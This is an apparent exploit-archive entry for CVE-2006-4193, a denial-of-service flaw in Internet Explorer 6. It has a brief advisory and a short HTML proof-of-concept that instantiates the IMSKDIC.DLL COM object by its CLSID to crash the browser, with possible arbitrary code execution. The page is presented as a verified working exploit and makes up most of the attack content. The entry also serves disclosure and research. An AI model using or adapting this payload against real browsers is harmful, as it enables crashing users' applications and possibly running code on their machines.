Microsoft Internet Explorer 6 - 'IMSKDIC.dll' Denial of Service

Author: nop
type: dos
platform: windows
port: 
date_added: 2006-08-15 
date_updated: 2013-09-19 
verified: 1 
codes: CVE-2006-4193;OSVDB-29345 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/19521/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users and may cause arbitrary code to run within the context of the application.

  <-- /Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
  //tested XP SP2 CN

  // nop (nop#xsec.org)
  // http://www.xsec.org


  // CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
  // Info: Microsoft IME SingleKanjiDictionary interface
  // ProgID: IMESingleKanjiDict.8.1
  // InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL

  --!>
  <html> <body>
  <object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" /object>
  </body> </html>